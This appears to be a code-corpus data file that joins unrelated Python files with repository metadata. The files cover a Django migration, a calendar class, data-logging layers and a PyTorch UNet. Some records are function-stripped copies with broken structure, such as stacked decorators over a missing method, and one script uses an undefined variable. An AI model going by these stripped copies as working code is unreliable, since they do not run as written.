manager.add_column(
table_class_name="Notification",
tablename="notification",
column_name="recipient",
column_class_name="ForeignKey",
params={
"references": User,
"on_delete": OnDelete.cascade,
"on_update": OnUpdate.cascade,
"default": None,
"null": True,
"primary": False,
"key": False,
"unique": False,
"index": False,
},
)
return manager
| 7,017 | 52 | 69 |
470d82fe0f9ff4d06e37cfd357a2fd5d5db8cc6b | 2,024 | py | Python | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | 2 | 2021-03-12T10:36:16.000Z | 2021-04-03T09:45:54.000Z | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | null | null | null | lunar_python/SolarSeason.py | AD189/lunar-python | 2463c7b493e67895476c11cf1a12ff146f2d54e4 | [
"MIT"
] | 1 | 2021-03-08T13:31:53.000Z | 2021-03-08T13:31:53.000Z | # -*- coding: utf-8 -*-
from math import ceil
from .SolarMonth import SolarMonth
class SolarSeason:
"""
阳历季度
"""
MONTH_COUNT = 3
@staticmethod
@staticmethod
def getIndex(self):
"""
获取当月是第几季度
:return: 季度序号,从1开始
"""
return int(ceil(self.__month * 1.0 / SolarSeason.MONTH_COUNT))
def getMonths(self):
"""
获取本季度的阳历月列表
:return: 阳历月列表
"""
l = []
index = self.getIndex() - 1
for i in range(0, SolarSeason.MONTH_COUNT):
l.append(SolarMonth.fromYm(self.__year, SolarSeason.MONTH_COUNT * index + i + 1))
return l
def next(self, seasons):
"""
季度推移
:param seasons: 推移的季度数,负数为倒推
:return: 推移后的季度
"""
if 0 == seasons:
return SolarSeason.fromYm(self.__year, self.__month)
year = self.__year
month = self.__month
months = SolarSeason.MONTH_COUNT * seasons
if months == 0:
return SolarSeason.fromYm(year, month)
n = abs(months)
for i in range(1, n + 1):
if months < 0:
month -= 1
if month < 1:
month = 12
year -= 1
else:
month += 1
if month > 12:
month = 1
year += 1
return SolarSeason.fromYm(year, month)
| 23.811765 | 93 | 0.51581 | # -*- coding: utf-8 -*-
from math import ceil
from .SolarMonth import SolarMonth
class SolarSeason:
"""
阳历季度
"""
MONTH_COUNT = 3
def __init__(self, year, month):
self.__year = year
self.__month = month
@staticmethod
def fromDate(date):
return SolarSeason(date.year, date.month)
@staticmethod
def fromYm(year, month):
return SolarSeason(year, month)
def getYear(self):
return self.__year
def getMonth(self):
return self.__month
def toString(self):
return str(self.__year) + "." + str(self.getIndex())
def toFullString(self):
return str(self.__year) + "年" + str(self.getIndex()) + "季度"
def __str__(self):
return self.toString()
def getIndex(self):
"""
获取当月是第几季度
:return: 季度序号,从1开始
"""
return int(ceil(self.__month * 1.0 / SolarSeason.MONTH_COUNT))
def getMonths(self):
"""
获取本季度的阳历月列表
:return: 阳历月列表
"""
l = []
index = self.getIndex() - 1
for i in range(0, SolarSeason.MONTH_COUNT):
l.append(SolarMonth.fromYm(self.__year, SolarSeason.MONTH_COUNT * index + i + 1))
return l
def next(self, seasons):
"""
季度推移
:param seasons: 推移的季度数,负数为倒推
:return: 推移后的季度
"""
if 0 == seasons:
return SolarSeason.fromYm(self.__year, self.__month)
year = self.__year
month = self.__month
months = SolarSeason.MONTH_COUNT * seasons
if months == 0:
return SolarSeason.fromYm(year, month)
n = abs(months)
for i in range(1, n + 1):
if months < 0:
month -= 1
if month < 1:
month = 12
year -= 1
else:
month += 1
if month > 12:
month = 1
year += 1
return SolarSeason.fromYm(year, month)
| 371 | 0 | 214 |
1ef5269a29ed14f340b7b35a1d453fbf4107d653 | 418 | py | Python | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | 1 | 2019-04-21T18:57:57.000Z | 2019-04-21T18:57:57.000Z | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | null | null | null | dedupper/migrations/0004_auto_20181024_1902.py | anthowen/duplify | 846d01c1b21230937fdf0281b0cf8c0b08a8c24e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.5 on 2018-10-24 19:02
from django.db import migrations, models
| 23.222222 | 72 | 0.617225 | # Generated by Django 2.0.5 on 2018-10-24 19:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dedupper', '0003_auto_20181024_1653'),
]
operations = [
migrations.AlterField(
model_name='progress',
name='completed_reps',
field=models.IntegerField(blank=True, default=0, null=True),
),
]
| 0 | 304 | 23 |
6ba3dd8d2110f5406aabb2ce13d75dbd24ed27c4 | 943 | py | Python | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | 1 | 2017-04-14T11:53:47.000Z | 2017-04-14T11:53:47.000Z | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | null | null | null | server.py | quixadhal/PyConq | af81685651d66a117b3a3c2f47e90d9be6d6119c | [
"MIT"
] | 1 | 2019-11-06T00:15:48.000Z | 2019-11-06T00:15:48.000Z | # -*- coding: utf-8 -*- line endings: unix -*-
__author__ = 'quixadhal'
import os
import sys
import time
import sysutils
import log_system
import db_system
logger = log_system.init_logging()
sys.path.append(os.getcwd())
if __name__ == '__main__':
logger.boot('System booting.')
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
db_system.init_db()
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
from db_system import Session
from option import Option
session = Session()
options = session.query(Option).first()
logger.boot('Using database version %s, created on %s', options.version, options.date_created)
#logger.boot('Port number is %d', options.port)
#logger.boot('Wizlock is %s', options.wizlock)
time.sleep(1)
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
logger.critical('System halted.')
| 26.194444 | 98 | 0.706257 | # -*- coding: utf-8 -*- line endings: unix -*-
__author__ = 'quixadhal'
import os
import sys
import time
import sysutils
import log_system
import db_system
logger = log_system.init_logging()
sys.path.append(os.getcwd())
if __name__ == '__main__':
logger.boot('System booting.')
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
db_system.init_db()
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
from db_system import Session
from option import Option
session = Session()
options = session.query(Option).first()
logger.boot('Using database version %s, created on %s', options.version, options.date_created)
#logger.boot('Port number is %d', options.port)
#logger.boot('Wizlock is %s', options.wizlock)
time.sleep(1)
snapshot = sysutils.ResourceSnapshot()
logger.info(snapshot.log_data())
logger.critical('System halted.')
| 0 | 0 | 0 |
1594aebaf6d0841b2caf45d8aa4b867e7d74fc2d | 616 | py | Python | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | null | null | null | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | null | null | null | scripts/prediction_scripts/final_edit_django_dbs.py | amanparmar17/cultivo-1 | 06030116ba47f99fee8f413404777c9dbdb4e92a | [
"MIT"
] | 1 | 2018-10-08T17:08:48.000Z | 2018-10-08T17:08:48.000Z | import pandas as pa
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import Imputer,LabelEncoder,OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
#%%
datset=pa.read_csv("datasets/One.csv")
#datset_district=datset.drop_duplicates('District_Name')['District_Name']
datset_crop=datset.drop_duplicates('crop')['crop']
#%%
for i in datset_crop:
value=(datset.loc[(datset['crop'] == i)])
for j in headers:
mean_1=(value[j]).mean()
| 29.333333 | 73 | 0.751623 | import pandas as pa
import numpy as np
import matplotlib.pyplot as plt
from sklearn.preprocessing import Imputer,LabelEncoder,OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_score
#%%
datset=pa.read_csv("datasets/One.csv")
#datset_district=datset.drop_duplicates('District_Name')['District_Name']
datset_crop=datset.drop_duplicates('crop')['crop']
#%%
for i in datset_crop:
value=(datset.loc[(datset['crop'] == i)])
for j in headers:
mean_1=(value[j]).mean()
| 0 | 0 | 0 |
983f1d8504e2d7ad92153087a3f6fde57e6d1a35 | 345 | py | Python | python/load_data.py | dnbh/kpg | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 69 | 2018-01-08T19:56:55.000Z | 2022-03-05T17:14:05.000Z | python/load_data.py | dnbaker/emp | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 6 | 2018-04-14T21:09:51.000Z | 2021-07-17T21:08:54.000Z | python/load_data.py | dnbaker/emp | c9e79b8092434919e9ac90dc199f49845403c2ba | [
"MIT"
] | 11 | 2018-03-21T19:28:35.000Z | 2021-06-29T17:33:34.000Z | #!/usr/bin/env python
import numpy as np
if __name__ == "__main__":
import sys
data = load_data(sys.argv[1])
print("data: %s, %s" % (data, str(data.shape)))
| 23 | 59 | 0.542029 | #!/usr/bin/env python
import numpy as np
def load_data(path):
return np.array([line.strip().split('\t')[2:] for
line in open(path) if line[0] != "#"],
dtype=np.double)
if __name__ == "__main__":
import sys
data = load_data(sys.argv[1])
print("data: %s, %s" % (data, str(data.shape)))
| 150 | 0 | 23 |
db472a55122303d1be9380f2fcee3bbadb791f64 | 56 | py | Python | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 46 | 2020-03-27T20:12:32.000Z | 2021-11-21T19:08:51.000Z | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 2 | 2020-04-06T10:43:04.000Z | 2020-07-01T18:26:10.000Z | examples/_tests_scripts/_alchemy.py | rhololkeolke/catalyst-rl | ec18ff4a58b6d00652f772231db8de86debb4b3d | [
"Apache-2.0"
] | 5 | 2020-04-17T14:09:53.000Z | 2021-05-10T08:58:29.000Z | # flake8: noqa
from catalyst_rl.dl import AlchemyRunner
| 18.666667 | 40 | 0.821429 | # flake8: noqa
from catalyst_rl.dl import AlchemyRunner
| 0 | 0 | 0 |
74525a6c7c9b583ed6d5b4b3b60fdfe64f60b9f1 | 766 | py | Python | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | null | null | null | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | null | null | null | piecash/__init__.py | aslehigh/piecash | 797aca5abd08b686e5d47f077b00a095fb4804ed | [
"MIT"
] | 1 | 2020-01-18T15:55:04.000Z | 2020-01-18T15:55:04.000Z | # -*- coding: utf-8 -*-
"""Python interface to GnuCash documents"""
from . import metadata
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
from ._common import (
GncNoActiveSession,
GnucashException, GncValidationError, GncImbalanceError,
Recurrence
)
from .core import (
Book,
Account, ACCOUNT_TYPES, AccountType,
Transaction, Split, ScheduledTransaction, Lot,
Commodity, Price,
create_book, open_book,
factories,
)
from .business import Vendor, Customer, Employee, Address
from .business import Invoice, Job
from .business import Taxtable, TaxtableEntry
from .budget import Budget, BudgetAmount
from .kvp import slot
from .ledger import ledger
| 26.413793 | 60 | 0.761097 | # -*- coding: utf-8 -*-
"""Python interface to GnuCash documents"""
from . import metadata
__version__ = metadata.version
__author__ = metadata.authors[0]
__license__ = metadata.license
__copyright__ = metadata.copyright
from ._common import (
GncNoActiveSession,
GnucashException, GncValidationError, GncImbalanceError,
Recurrence
)
from .core import (
Book,
Account, ACCOUNT_TYPES, AccountType,
Transaction, Split, ScheduledTransaction, Lot,
Commodity, Price,
create_book, open_book,
factories,
)
from .business import Vendor, Customer, Employee, Address
from .business import Invoice, Job
from .business import Taxtable, TaxtableEntry
from .budget import Budget, BudgetAmount
from .kvp import slot
from .ledger import ledger
| 0 | 0 | 0 |
8d7bbc000d01c91d54319de8215580d95edad4f0 | 3,304 | py | Python | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 62 | 2017-07-27T18:09:14.000Z | 2021-07-19T00:09:40.000Z | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 24 | 2017-06-24T03:26:45.000Z | 2020-11-11T15:24:29.000Z | pyrealtime/record_layer.py | ewhitmire/pyrealtime | 5cfd37ff7b05cf33d2aab9b9f45188ddf7c76db4 | [
"MIT"
] | 15 | 2017-07-02T23:22:25.000Z | 2020-10-28T15:23:58.000Z | from datetime import datetime
import numpy as np
import time
from pyrealtime.layer import ThreadLayer, TransformMixin, ProducerMixin, EncoderMixin
| 32.07767 | 125 | 0.590496 | from datetime import datetime
import numpy as np
import time
from pyrealtime.layer import ThreadLayer, TransformMixin, ProducerMixin, EncoderMixin
class RecordLayer(TransformMixin, EncoderMixin, ThreadLayer):
def __init__(self, port_in, filename=None, file_prefix="recording", append_time=False, split_axis=None, *args, **kwargs):
super().__init__(port_in, *args, **kwargs)
if filename is None:
filename = RecordLayer.make_new_filename(file_prefix)
self.filename = filename
self.file = None
self.append_time = append_time
self.split_axis = split_axis
def encode(self, data):
if isinstance(data, list):
line = ",".join([str(x) for x in data])
elif isinstance(data, np.ndarray):
if self.split_axis is not None:
line = ""
# for i in range(c.shape[self.split_axis]):
shape = [None] * len(data.shape)
for i in range(data.shape[self.split_axis]):
shape[self.split_axis] = i
line += ",".join([str(x) for x in np.squeeze(data[tuple(shape)]).tolist()]) + "\n"
else:
line = ",".join([str(x) for x in data.tolist()])
else:
line = str(data)
if self.append_time:
line = "%f,%s" % (time.time(), line)
if line[-1] != "\n":
line += "\n"
return line.encode('utf-8')
def initialize(self):
super().initialize()
self.file = open(self.filename, 'wb')
self.file.flush()
def transform(self, data):
self.file.write(self._encode(data))
self.file.flush()
def shutdown(self):
self.file.close()
@staticmethod
def make_new_filename(prefix):
timestamp = datetime.now().strftime("%y_%m_%d_%H_%M_%S")
return "%s_%s.txt" % (prefix, timestamp)
class PlaybackLayer(ProducerMixin, ThreadLayer):
def __init__(self, filename=None, rate=1, strip_time=False, *args, **kwargs):
super().__init__(*args, **kwargs)
self.filename = filename
self.file = None
self.interval = 1 / rate
self.strip_time = strip_time
def decode(self, line):
data = line.decode('utf-8').strip()
if self.strip_time:
data = data[data.index(',')+1:]
return data
def initialize(self):
self.file = open(self.filename, 'rb')
def get_input(self):
line = self.file.readline()
if len(line) == 0:
self.stop()
return None
time.sleep(self.interval)
return self.decode(line)
class AudioWriter(TransformMixin, ThreadLayer):
def __init__(self, port_in, filename=None, sample_rate=44100, *args, **kwargs):
super().__init__(port_in, *args, **kwargs)
if filename is None:
filename = RecordLayer.make_new_filename('recording')
self.filename = filename
self.sample_rate = sample_rate
def transform(self, data):
import scipy.io.wavfile
scipy.io.wavfile.write(self.filename, self.sample_rate, data)
@staticmethod
def make_new_filename():
timestamp = datetime.now().strftime("%y_%m_%d_%H_%M_%S")
return "recording_%s.txt" % timestamp
| 2,606 | 370 | 176 |
a7030cae2429a487b2f2fa49806ec37f38fc6875 | 107 | py | Python | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 20 12:17:30 2021
@author: jorge
"""
| 13.375 | 35 | 0.598131 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 20 12:17:30 2021
@author: jorge
"""
| 0 | 0 | 0 |
07f74a95da853c13aa66d869a6ab1ec3af5c3c47 | 14,957 | py | Python | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2019
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
The U-Net is a convolutional encoder-decoder neural network.
"""
# Imports
import ast
import collections
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as func
from pynet.utils import tensor2im
class UNet(nn.Module):
""" UNet.
The U-Net is a convolutional encoder-decoder neural network.
Contextual spatial information (from the decoding,
expansive pathway) about an input tensor is merged with
information representing the localization of details
(from the encoding, compressive pathway).
Modifications to the original paper:
- padding is used in 3x3x3 convolutions to prevent loss
of border pixels
- merging outputs does not require cropping due to (1)
- residual connections can be used by specifying
UNet(merge_mode='add')
- if non-parametric upsampling is used in the decoder
pathway (specified by upmode='upsample'), then an
additional 1x1x1 3d convolution occurs after upsampling
to reduce channel dimensionality by a factor of 2.
This channel halving happens with the convolution in
the tranpose convolution (specified by upmode='transpose')
"""
def __init__(self, num_classes, in_channels=1, depth=5,
start_filts=16, up_mode="transpose", down_mode="maxpool",
merge_mode="concat", batchnorm=False, dim="3d",
skip_connections=False, mode="seg", input_size=None,
nb_regressors=None, freeze_encoder=False):
""" Init class.
Parameters
----------
num_classes: int
the number of features in the output segmentation map.
in_channels: int, default 1
number of channels in the input tensor.
depth: int, default 5
number of layers in the U-Net.
start_filts: int, default 16
number of convolutional filters for the first conv.
up_mode: string, default 'transpose'
type of upconvolution. Choices: 'transpose' for transpose
convolution, 'upsample' for nearest neighbour upsampling
down_mode: string, default 'maxpool'
Choices: 'maxpool' for maxpool, 'conv' for convolutions with stride=2
merge_mode: str, default 'concat', can be 'add' or None
the skip connections merging strategy.
skip_connections: bool, whether we add skip connections between conv layers or not
batchnorm: bool, default False
normalize the inputs of the activation function.
mode: 'str', default 'seg'
Whether the network is turned in 'segmentation' mode ("seg") or 'classification' mode ("classif") or both
("seg_classif"). Only the encoder can be also used in mode ("encoder")
The input_size is required for classification
input_size: tuple (optional) it is required for classification only. It should be a tuple (C, H, W, D) (for 3d)
or (C, H, W) (for 2d)
dim: str, default '3d'
'3d' or '2d' input data.
"""
# Inheritance
super(UNet, self).__init__()
# Check inputs
if dim in ("2d", "3d"):
self.dim = dim
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'3d' and '2d' are allowed.".format(dim))
if mode in ("seg", "classif", "seg_classif", "encoder", "simCLR"):
self.mode = mode
else:
raise ValueError("'{}' is not a valid mode. Should be in 'seg' "
"or 'classif' mode.".format(mode))
if up_mode in ("transpose", "upsample"):
self.up_mode = up_mode
else:
raise ValueError(
"'{}' is not a valid mode for upsampling. Only 'transpose' "
"and 'upsample' are allowed.".format(up_mode))
if merge_mode in ("concat", "add", None):
self.merge_mode = merge_mode
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'concat' and 'add' are allowed.".format(up_mode))
if down_mode in ("maxpool", "conv"):
self.down_mode = down_mode
else:
raise ValueError(
"'{}' is not a valid mode for down sampling. Only 'maxpool' "
"and 'conv' are allowed".format(down_mode)
)
if self.up_mode == "upsample" and self.merge_mode == "add":
raise ValueError(
"up_mode 'upsample' is incompatible with merge_mode 'add' at "
"the moment because it doesn't make sense to use nearest "
"neighbour to reduce depth channels (by half).")
# Declare class parameters
self.num_classes = num_classes
self.in_channels = in_channels
self.start_filts = start_filts
self.input_size = input_size
self.nb_regressors = nb_regressors
self.depth = depth
self.down = []
self.up = [] # Useful in seg mode
self.classifier = None # Useful in classif mode
self.freeze_encoder = freeze_encoder
self.name = "UNet_D%i_%s" % (self.depth, self.mode)
# Create the encoder pathway
for cnt in range(depth):
in_channels = self.in_channels if cnt == 0 else out_channels
out_channels = self.start_filts * (2**cnt)
down_sampling = False if cnt == 0 else True
self.down.append(
Down(in_channels, out_channels, self.dim, down_mode=self.down_mode,
pooling=down_sampling, batchnorm=batchnorm,
skip_connections=skip_connections))
# Freeze all the layers if necessary
if self.freeze_encoder:
for down_m in self.down:
for param in down_m.parameters():
param.requires_grad = False
if self.mode == "seg" or self.mode == "seg_classif":
# Create the decoder pathway
# - careful! decoding only requires depth-1 blocks
for cnt in range(depth - 1):
in_channels = out_channels
out_channels = in_channels // 2
self.up.append(
Up(in_channels, out_channels, up_mode=up_mode, dim=self.dim,
merge_mode=merge_mode, batchnorm=batchnorm,
skip_connections=skip_connections))
if self.mode == "classif" or self.mode == "seg_classif":
self.classifier = Classifier(self.nb_regressors, features=self.start_filts * 2**(self.depth-1))
elif self.mode == 'simCLR':
self.hidden_representation = nn.Linear(self.start_filts * (2**(self.depth-1)), 512)
self.head_projection = nn.Linear(512, 128)
# Add the list of modules to current module
self.down = nn.ModuleList(self.down)
self.up = nn.ModuleList(self.up)
# Get ouptut segmentation
if self.mode == "seg" or self.mode == "seg_classif":
self.conv_final = Conv1x1x1(out_channels, self.num_classes, self.dim)
# Kernel initializer
# Weight initialization
self.weight_initializer()
class Down(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 MaxPool.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
class Up(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 UpConvolution.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
| 40.424324 | 119 | 0.588487 | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2019
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
The U-Net is a convolutional encoder-decoder neural network.
"""
# Imports
import ast
import collections
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as func
from pynet.utils import tensor2im
class UNet(nn.Module):
""" UNet.
The U-Net is a convolutional encoder-decoder neural network.
Contextual spatial information (from the decoding,
expansive pathway) about an input tensor is merged with
information representing the localization of details
(from the encoding, compressive pathway).
Modifications to the original paper:
- padding is used in 3x3x3 convolutions to prevent loss
of border pixels
- merging outputs does not require cropping due to (1)
- residual connections can be used by specifying
UNet(merge_mode='add')
- if non-parametric upsampling is used in the decoder
pathway (specified by upmode='upsample'), then an
additional 1x1x1 3d convolution occurs after upsampling
to reduce channel dimensionality by a factor of 2.
This channel halving happens with the convolution in
the tranpose convolution (specified by upmode='transpose')
"""
def __init__(self, num_classes, in_channels=1, depth=5,
start_filts=16, up_mode="transpose", down_mode="maxpool",
merge_mode="concat", batchnorm=False, dim="3d",
skip_connections=False, mode="seg", input_size=None,
nb_regressors=None, freeze_encoder=False):
""" Init class.
Parameters
----------
num_classes: int
the number of features in the output segmentation map.
in_channels: int, default 1
number of channels in the input tensor.
depth: int, default 5
number of layers in the U-Net.
start_filts: int, default 16
number of convolutional filters for the first conv.
up_mode: string, default 'transpose'
type of upconvolution. Choices: 'transpose' for transpose
convolution, 'upsample' for nearest neighbour upsampling
down_mode: string, default 'maxpool'
Choices: 'maxpool' for maxpool, 'conv' for convolutions with stride=2
merge_mode: str, default 'concat', can be 'add' or None
the skip connections merging strategy.
skip_connections: bool, whether we add skip connections between conv layers or not
batchnorm: bool, default False
normalize the inputs of the activation function.
mode: 'str', default 'seg'
Whether the network is turned in 'segmentation' mode ("seg") or 'classification' mode ("classif") or both
("seg_classif"). Only the encoder can be also used in mode ("encoder")
The input_size is required for classification
input_size: tuple (optional) it is required for classification only. It should be a tuple (C, H, W, D) (for 3d)
or (C, H, W) (for 2d)
dim: str, default '3d'
'3d' or '2d' input data.
"""
# Inheritance
super(UNet, self).__init__()
# Check inputs
if dim in ("2d", "3d"):
self.dim = dim
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'3d' and '2d' are allowed.".format(dim))
if mode in ("seg", "classif", "seg_classif", "encoder", "simCLR"):
self.mode = mode
else:
raise ValueError("'{}' is not a valid mode. Should be in 'seg' "
"or 'classif' mode.".format(mode))
if up_mode in ("transpose", "upsample"):
self.up_mode = up_mode
else:
raise ValueError(
"'{}' is not a valid mode for upsampling. Only 'transpose' "
"and 'upsample' are allowed.".format(up_mode))
if merge_mode in ("concat", "add", None):
self.merge_mode = merge_mode
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'concat' and 'add' are allowed.".format(up_mode))
if down_mode in ("maxpool", "conv"):
self.down_mode = down_mode
else:
raise ValueError(
"'{}' is not a valid mode for down sampling. Only 'maxpool' "
"and 'conv' are allowed".format(down_mode)
)
if self.up_mode == "upsample" and self.merge_mode == "add":
raise ValueError(
"up_mode 'upsample' is incompatible with merge_mode 'add' at "
"the moment because it doesn't make sense to use nearest "
"neighbour to reduce depth channels (by half).")
# Declare class parameters
self.num_classes = num_classes
self.in_channels = in_channels
self.start_filts = start_filts
self.input_size = input_size
self.nb_regressors = nb_regressors
self.depth = depth
self.down = []
self.up = [] # Useful in seg mode
self.classifier = None # Useful in classif mode
self.freeze_encoder = freeze_encoder
self.name = "UNet_D%i_%s" % (self.depth, self.mode)
# Create the encoder pathway
for cnt in range(depth):
in_channels = self.in_channels if cnt == 0 else out_channels
out_channels = self.start_filts * (2**cnt)
down_sampling = False if cnt == 0 else True
self.down.append(
Down(in_channels, out_channels, self.dim, down_mode=self.down_mode,
pooling=down_sampling, batchnorm=batchnorm,
skip_connections=skip_connections))
# Freeze all the layers if necessary
if self.freeze_encoder:
for down_m in self.down:
for param in down_m.parameters():
param.requires_grad = False
if self.mode == "seg" or self.mode == "seg_classif":
# Create the decoder pathway
# - careful! decoding only requires depth-1 blocks
for cnt in range(depth - 1):
in_channels = out_channels
out_channels = in_channels // 2
self.up.append(
Up(in_channels, out_channels, up_mode=up_mode, dim=self.dim,
merge_mode=merge_mode, batchnorm=batchnorm,
skip_connections=skip_connections))
if self.mode == "classif" or self.mode == "seg_classif":
self.classifier = Classifier(self.nb_regressors, features=self.start_filts * 2**(self.depth-1))
elif self.mode == 'simCLR':
self.hidden_representation = nn.Linear(self.start_filts * (2**(self.depth-1)), 512)
self.head_projection = nn.Linear(512, 128)
# Add the list of modules to current module
self.down = nn.ModuleList(self.down)
self.up = nn.ModuleList(self.up)
# Get ouptut segmentation
if self.mode == "seg" or self.mode == "seg_classif":
self.conv_final = Conv1x1x1(out_channels, self.num_classes, self.dim)
# Kernel initializer
# Weight initialization
self.weight_initializer()
def weight_initializer(self):
for module in self.modules():
if isinstance(module, nn.ConvTranspose3d) or isinstance(module, nn.Conv3d):
nn.init.xavier_normal_(module.weight)
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.BatchNorm2d):
nn.init.constant_(module.weight, 1)
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.Linear):
nn.init.normal_(module.weight, 0, 0.01)
nn.init.constant_(module.bias, 0)
def forward(self, x):
encoder_outs = []
for module in self.down:
x = module(x)
encoder_outs.append(x)
x_enc = x
if self.mode == "encoder":
# Avg over each output feature map, output size should be == nb_filters
return nn.functional.adaptive_avg_pool3d(x_enc, 1)
elif self.mode == 'simCLR':
x_enc = nn.functional.relu(x_enc)
x_enc = nn.functional.adaptive_avg_pool3d(x_enc, 1)
x_enc = torch.flatten(x_enc, 1)
x_enc = self.hidden_representation(x_enc)
x_enc = nn.functional.relu(x_enc)
x_enc = self.head_projection(x_enc)
return x_enc
if self.mode == "seg" or self.mode == "seg_classif":
encoder_outs = encoder_outs[:-1][::-1]
for cnt, module in enumerate(self.up):
x_up = encoder_outs[cnt]
x = module(x, x_up)
# No softmax is used. This means you need to use
# nn.CrossEntropyLoss in your training script,
# as this module includes a softmax already.
x_seg = self.conv_final(x)
if self.mode == "classif" or self.mode == "seg_classif":
# No softmax used
x_classif = self.classifier(x_enc)
if self.mode == "seg":
return x_seg
if self.mode == "classif":
return x_classif
return [x_seg, x_classif]
class Classifier(nn.Module):
def __init__(self, nb_regressors, features):
super(Classifier, self).__init__()
self.num_classes = nb_regressors
self.features = features
self.fc1 = nn.Linear(self.features, 1024, bias=True)
self.fc2 = nn.Linear(1024, self.num_classes, bias=True)
self.relu = nn.LeakyReLU(inplace=True)
self.avgpool = nn.AdaptiveAvgPool3d(1)
def forward(self, x):
x = torch.flatten(self.avgpool(x), 1)
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return x.squeeze(1)
class DoubleConv(nn.Module):
def __init__(self, in_channels, out_channels, dim, kernel_size=3, stride=1,
padding=1, bias=True, batchnorm=True):
super(DoubleConv, self).__init__()
self.batchnorm = batchnorm
self.conv1 = eval(
"nn.Conv{0}(in_channels, out_channels, kernel_size, "
"stride=stride, padding=padding, bias=bias)".format(dim))
self.conv2 = eval(
"nn.Conv{0}(out_channels, out_channels, kernel_size, "
"stride=stride, padding=padding, bias=bias)".format(dim))
self.relu = nn.ReLU(inplace=True)
if batchnorm:
self.norm1 = eval(
"nn.BatchNorm{0}(out_channels)".format(dim))
self.norm2 = eval(
"nn.BatchNorm{0}(out_channels)".format(dim))
def forward(self, x):
